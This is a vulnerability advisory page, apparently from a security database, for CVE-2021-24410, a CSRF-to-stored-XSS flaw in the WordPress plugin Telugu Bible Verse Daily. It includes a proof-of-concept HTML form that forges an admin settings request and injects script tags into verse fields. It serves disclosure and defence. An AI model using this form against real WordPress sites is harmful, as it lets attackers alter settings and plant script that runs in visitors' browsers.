Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitAshishWPEX-ID:B47EA36E-F37C-4745-B750-31F5B91F543F
HistoryJul 19, 2021 - 12:00 a.m.

Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS

2021-07-1900:00:00
Ashish
414

0.001 Low

EPSS

Percentile

28.1%

JSON

The plugin is lacking any CSRF check when saving its settings and verses, and do not sanitise or escape them when outputting them back in the page. This could allow attackers to make a logged in admin change the settings, as well as add malicious verses containing JavaScript code in them, leading to Stored XSS issues

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=telugu-bible-verse-daily%2FTeluguBibleVersedisplay.php" method="POST">
      <input type="hidden" name="tvd_post_type" value="fav" />
      <input type="hidden" name="tvd_connection" value="fopen" />
      <input type="hidden" name="chapter" value="<script>alert(/XSS1/)</script>" />
      <input type="hidden" name="verse" value="<script>alert(/XSS2/)</script>" />
      <input type="hidden" name="verse_add" value="Add Verse ร‚ยป" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Related

nvd 1
cve 1
prion 1
cvelist 1
wpvulndb 1
nvd
nvd
CVE-2021-24410
2021-08-16 11:15:08
cve
cve
CVE-2021-24410
2021-08-16 11:15:08
prion
prion
Cross site request forgery (csrf)
2021-08-16 11:15:00
cvelist
cvelist
CVE-2021-24410 Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS
2021-08-16 10:48:19
wpvulndb
wpvulndb
Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS
2021-07-19 00:00:00

0.001 Low

EPSS

Percentile

28.1%

JSON
Related for WPEX-ID:B47EA36E-F37C-4745-B750-31F5B91F543F
nvd1cve1prion1cvelist1wpvulndb1